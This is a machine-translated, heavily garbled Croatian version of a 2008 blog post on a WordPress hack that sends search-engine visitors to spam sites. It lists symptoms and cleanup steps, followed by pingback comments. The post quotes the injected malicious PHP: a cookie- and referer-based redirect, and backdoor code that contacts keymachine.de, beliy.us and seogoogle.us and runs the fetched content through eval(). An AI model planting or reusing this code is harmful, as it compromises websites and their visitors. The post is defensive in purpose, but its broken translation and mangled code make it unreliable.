WordPress Hack: Obnova i Škripac Google i Mehanizam za pretraživanje ili Nijedan Keks Promet Redirekcija to Tvoj-Needs.info, AnyResults.Net, Zlatan-Info.net i Ostali Ilegalan Položaj
Haker jesu odlazeći potpuno to hack i iskorištavati WordPress blogs hostel sve do tkanje, tvornica i ubrizgavanje zloban kod u WordPress kod i baza podataka kako bi redirekcija posjetilac i hits from Google i ostali traženje motor to spam položaj kao što je tvoj-needs.info, anyresults.net, zlatan-info.net, keymachine.de, beliy.us, seogoogle.us i mnogobrojan ostali spam položaj taj ispunjen sa plaća- na- klik CPC oglasi. Neki hack pojaviti se to cilj veći gužva mimo redirekcija svi sa WordPress keks. Sa bio sjeckan, te promet pretpostavljen to stići at blog kao odredište.
Simptom dana Mehanizam za pretraživanje Redirekcija Hack
Bilješka taj ne svi simptom svibanj dogoditi se ukupno. Ima može biti više od neki Metodije od hack biće, što pridonijeti to različit nađi prema i moguć rješenje.
- Bilo koji klik preko from traženje motor kao što je Google, Ehej, AOL, MSN, Windows Živ rezultati pretraživanja, uključujući blog ugled, htijenje biti redirekcija i špediter to haker’ položaj kao što je tvoj-needs.info, anyresults.net, zlatan-info.net, keymachine.de, beliy.us, seogoogle.us, sa rub siguran to rasti. Razglednik stići at haker stranica sa jednak niz za pretraživanje koju je on ili ona naviknut traženje in mehanizam za pretraživanje.
- Kliknite na povezati to blog na RSS hranjenje čitač kao što je Google čitač može biti redirekcija to haker položaj previše.
- posjetilac sa nema računa na blog, ili ne prijava ( stoga ne je keks otkriti mimo zloban kod), htijenje biti redirekcija to spam položaj.
- Jedini gostovanje from mehanizam za pretraživanje jesu bio redirekcija daleko, i izigrati uprava to proludirati se vjerojatno puno od bloggers, webmasteri i položaj posjedovanje, ili barem odgođeno otkrivanje dana problem.
- Nenadan ogroman i dramatično kap i izgubiti od masivan iznos od posjetilac promet i stranica pogled in tkanje metak sa svijetlećim tragom statistika, napose promet sa Google kao koji se odnosi na koga, čak i da mehanizam za pretraživanje rezultat red je netaknut.
- Masiv kap od koji oglašava prihod from Google AdSense ili ostali oglasi mreža, ili podružnica komisija.
- Slijedeće temeljiti šifriranje PHP kod svibanj pojaviti se na wp-blog-header.php varalica:
<?php \
$serefarraygoogle,msn,live,altavista,ask,yahoo,aol,cnn,weather,alexa=("""""""""""""""""""");
$ser0=; foreachseref($ kao $ref) ifstrposstrtolower_SERVER’HTTP_REFERER’,ref((($[])$)!==neistinit){ $ser1=”?;izbiti; }
ako && sizeof_COOKIE0($)==){ headerLocation(”: http:/”.base64_decodeYW55cmVzdWx0cy5uZXQ.(”=”)”/”); izlaz; }? > - predodžba, što je zapravo hrpa od zloban PHP kod, je dodani to wp- Sadržaj/ upload imenik. Na primjer, wp- Sadržaj/ upload/2008/06/06/abcdefghijklmn.jpg, ili Internet može biti unutar vaše tema savijač, i.e. wp-contents/themes/classic/images/xyz.jpg. Ime dana predodžba može biti in oblik zapisa od xxxxxx_old.jpeg.
- ulaz je umetnuti in MySQL baza podataka za WordPress wp_options to ActiveX predodžba ( zloban PHP kod) kao čep, tipičan kao rss_f541b3abd05e7962fcab37737f40fad8.
- Ima može biti isto tako zloban kod, napose oni taj protumačiti sa eval() ili base64_decode() naredba bio umetnuti u ostali WordPress PHP kartoteka. Primjer jesu slijedeće kod:
ifisset_GET'p'(($[])) {
$dokoljenka = @fsockopenkm20725.keymachine.de(’’, 80);
ifsock($){
fwrite ($ dokoljenka, ‘ dobiti http:/km20725.keymachine.de/ poslužitelj/index.php?/host._SERVER'SERVER_NAME'.p._GET'p'.=’$[]’&=’$[]’ HTTP/1.0.rn′”\\”);
fwrite ($ dokoljenka, ‘ domaćin: km20725.keymachine.de.rnrn’”\\\\”);
whilecontent($[] = fgets ($ dokoljenka));
$izdovoljiti se = implode(”, $ izdovoljiti se);
@evaltrimsubstrcontent((($, strposcontent($, “\rnrn\\\”))));
fclose ($ dokoljenka);}
}ifisset_GET'p'(($[])) { @eval@file_get_contentshttp((’:/beliy.us/ poslužitelj/index.php?/host._SERVER'SERVER_NAME'.p._GET'p'=’$[]’&=’$[]));
}ifisset_GET'p'(($[])) { @eval@file_get_contentshttp((’:/seogoogle.us/ poslužitelj/index.php?/host._SERVER'SERVER_NAME'.p._GET'p'=’$[]’&=’$[]));
}evalgzinflatebase64_decode((( - WordPress tema taj je bio aktivirati i iskorišten može biti ubrizgati sa sjeckanje kod i izvještačen previše. Kao što je kod normalno biti in header.php ili index.php dana tema, i ima crta sličan to ispod
ifser”1″($== && sizeof_COOKIE0($)==){ header”Location(:
WordPress traženje promet redirekcija to spam položaj hack dogoditi se vjerojatno zbog sigurnost jamski i ranjivost taj nije skrpan našto blog vlasnik odlučio je da ne to ažurirati na najnoviji inačici WordPress ( mada nekiizvještaj taj njihov blogs bio sjeckan čak i da svoj’ već na najnoviji inačici WordPress 2.5.1). Tko god nanijeti, krivovjerje’ škripac i rješenje to odluka i poraz hack kako bi se osiguralo taj te vratiti milo za drago promet i izbjeći bio proglasiti kažnjivim mimo Google mimo nerazuman redirekcija to spam Stranice.
- Sigurnosna kopija WordPress baza podataka.
- Iskoristiti phpMyAdmin to brstiti WordPress MySQL baza podataka žlica za juhu. Otiđite na wp_options stol, i tada uređivati red naimenovan active_plugins. red detalj svi ActiveX čep taj je aktivirati. Proći rub ( stalan), i tražiti čep naimenovan kraj sa predodžba protezanje, kao što je .jpg, .jpeg, .gif i itd. Na primjer, abcdefgh_old.jpeg. Bilješka dolje staza to predodžba varalica.
- Koristeći sFTP ili SSH ( zaboraviti o FTP ili Telnet za sigurnost), onda ploviti to staza dana varalica, i izbrisati datoateka.
- Otiđite na WordPress Upravnik Čep pravokutna ploča, prestati ili ActiveX bilo koji čep to jasan od zloban čep from “active_plugins” red.
- Leđa to phpMyAdmin, at wp_options stol, nađi prema red taj sadržati slijedeće vrpca kao option_name:
rss_f541b3abd05e7962fcab37737f40fad8Izbrisati odveslati.
Ukoliko dont’ znati kako to obaviti baza podataka čist detaljan in skaline iznad, krivovjerje’ video udžbenik:
- Otiđite na wp_users stol. Ako ima neizrecivost korisnik ( nula vrijednost in user_nicename polje) oformljen at 000000:: na 0000-00-00, bilješka dolje korisnik IDENTIFIKACIJA ( identifikacija polje, izvjestan broj). Izbrisati korisnik.
- Brstiti wp_usermeta stol. Smjestiti svi rows sa korisnik šibice IDENTIFIKACIJA dana izbrisati ilegalan korisnik. Ima normalno tri rows bio kolega to upadač korisnik Identifikacija. Izbrisati svi kolega rows.
- Prijava to poslužitelj to uređivati tema kartoteka, ili brstiti tema kartoteka’ kod in Tema Editor od WordPress Upravnik Crtati pravokutna ploča. Ček header.php i index.php za bilo koji koji sluti kod. Kao navedeni iznad, tražiti nešto sličan to borac ispod:
ifser”1″($== && sizeof_COOKIE0($)==){ header”Location(:Ako postaviti, izbrisati i maknuti kod. Bilješka taj zloban kod htijenje biti pojedini linije čeznuti sveukupno.
- Ako svoj’ ne već biće, stvoriti prazan index.html varalica in wp- Sadržaj/ čep imenik. prazan index.html Sakrij sadržaj čep imenik, efektivno štit što čep-ins bio iskorišten from haker to očeličiti i nategnuti WordPress sigurnost.
- Upload i opet staviti svaki i svaki WordPress kartoteka ( ne jedini wp-blog-header.php) na poslužitelj sa svjež, čist, i izvorninajnoviji inačici from WordPress (naravno, Excel malo kartoteka kao što je wp-config.php i tema). Ako tvoj’ ažurirati na, čitanje vodič pažljivo.
- Chanel tvoj lozinka.
- Ukoliko imati mnogostruk korisnik, Chanel njihov lozinka ( ili pitati njima to Chanel lozinka) previše.
važan: Ovaj je stroj prevedeno stranica što je pružena " kakav je" sa garantni. Strojno prevođenje može biti težak to shvatiti. Molimo pogledajteizvorni Engleski jezik članak ma kada moguć.
Udio i pridonijeti ili dobiti tehnička podrška i pomoć at Moj Koji se tiče prsta Život Forum.
Povezivati se Članak
- Dodati NoFollow Srodstvo to WordPress Blogroll to Povećanje PageRank
- WordPress Čep: Otkriti Google Analitičan i FeedBurner Izvještaj Statistika from Položaj Admin
- Technorati Dolazak Povezati Čep za WordPress
- Letimice pogledati Google Trgovac Traženje
- Kako to Izbjeći, Zaobići ili Bježati Google Pokriti vrećama pijeska
- SEO Prijazan Prepisati Metodije to Premjestiti Website URL From Poddirektorij to Korijen Roditelj Savijač
- Voziti Više Promet koristeći Predodžba
- Ask.com Mehanizam za pretraživanje Ponovo ispitivanje mimo CNNMoney
- Integrirati i Otkriti Google AdSense za Traženje i Co-Op Mušterija Mehanizam za pretraživanje Rezultat in WordPress Blog Stranica Predložak
- StatTraq Wordpress Čep za Položaj Statističar i Promet Šalter

































Lipanj 12th, 2008 1006:
[...] Moj Koji se tiče prsta Život WordPress Hack: Obnova i Škripac Google i Mehanizam za pretraživanje ili Nijedan Keks Promet Redirekcija…[...]
Lipanj 12th, 2008 1114:
[...] wersja WP 2.5.1 byĹ‚a naraĹĽona na jakieĹ› problem. w caĹ‚ym tym zamieszaniu, zwanym juĹĽ Mehanizam za pretraživanje Redirekcija Hack, chodzi o przekierowanie riš z wyszukiwarek, głównie Google, choć nie tylko, na specjalnie [...]
Lipanj 12th, 2008 1443:
[...] WordPress Hack: Obnova i Škripac Google i Mehanizam za pretraživanje ili Nijedan Keks Promet Redirekcija to Tvoj-Nee… Udio ili Poslati Ovaj to prijatelj Kugla: Povezivati se ContentWant više tkanje softver ponovo ispitivanje? Onda osigurati te potpisati na naš RSS hranjenje ili dobiti naš prilagodljiv widget i položiti Internet na tvoj položaj! Povezivati se pošta WordPress preko iskorišten OpenBSD izvor blog softver[...]
Lipanj 12th, 2008 1940:
[...] Kalau peringkat blog WordPress kita di Google tetanus neokrenut ključna riječ kita, manioka pengunjung turun drastičan, hati-hati, bisa jadi itu artinya blog kita kena hack dan di redirekcija ke situirati spam. [...]
Lipanj 13th, 2008 1200:
[...] Moj Koji se tiče prsta Život WordPress Hack: Obnova i Škripac Google i Mehanizam za pretraživanje ili Nijedan Keks Promet Redirekcija…[...]
Lipanj 13th, 2008 1336:
[...] WordPress Hack: Obnova i Škripac Google i Mehanizam za pretraživanje ili Nijedan Keks Promet Redirekcija Moj Koji se tiče prsta… WordPress Hack: Obnova i Škripac Google i Mehanizam za pretraživanje ili Nijedan Keks Promet Redirekcija to Tvoj-Needs.info, AnyResults.Net, Zlatan-Info.net i Ostali Ilegalan Položaj » Moj Koji se tiče prsta Život (tags: wordpress sigurnost)[...]
Lipanj 18th, 2008 2208:
[...] Moj Koji se tiče prsta Život WordPress Hack: Obnova i Škripac Google i Mehanizam za pretraživanje ili Nijedan Keks Promet Redirekcija…[...]
Srpanj 3rd, 2008 0308:
[...] ca sa-mi dau sema unde e buba, daca nu mi-ar fi spus Eugenički intr-o discutie la kavana, ca gasit de povezati pe Google si ar fi hmelj sa- gradska nadzemna željeznica vad. MyDigitalLife.info, au objava de artičoka cu naslov : [...]
Srpanj 15th, 2008 0810:
[...] JA je uhvaćen Internet ranije na i je napravio siguran to maknuti svi zloban kod Ovdje je izbirljiv udžbenik kako to čist tvoj položaj ako ovaj preterit od be to dogoditi se to [...]
Srpanj 17th, 2008 1030:
[...] WordPress Hack: Obnova i Škripac Google i Mehanizam za pretraživanje ili Nijedan Keks Promet Redirekcija to Tvoj-Nee…. [...]
Srpanj 25th, 2008 0949:
[...] braniti una merda dogoditi se obuzdati tra le manija siete già statičan okruženost o pansion di postojanje, qui e qui nađeno blago le specifičan dellexploit’ e alcuni izručiti korisni programi na[...]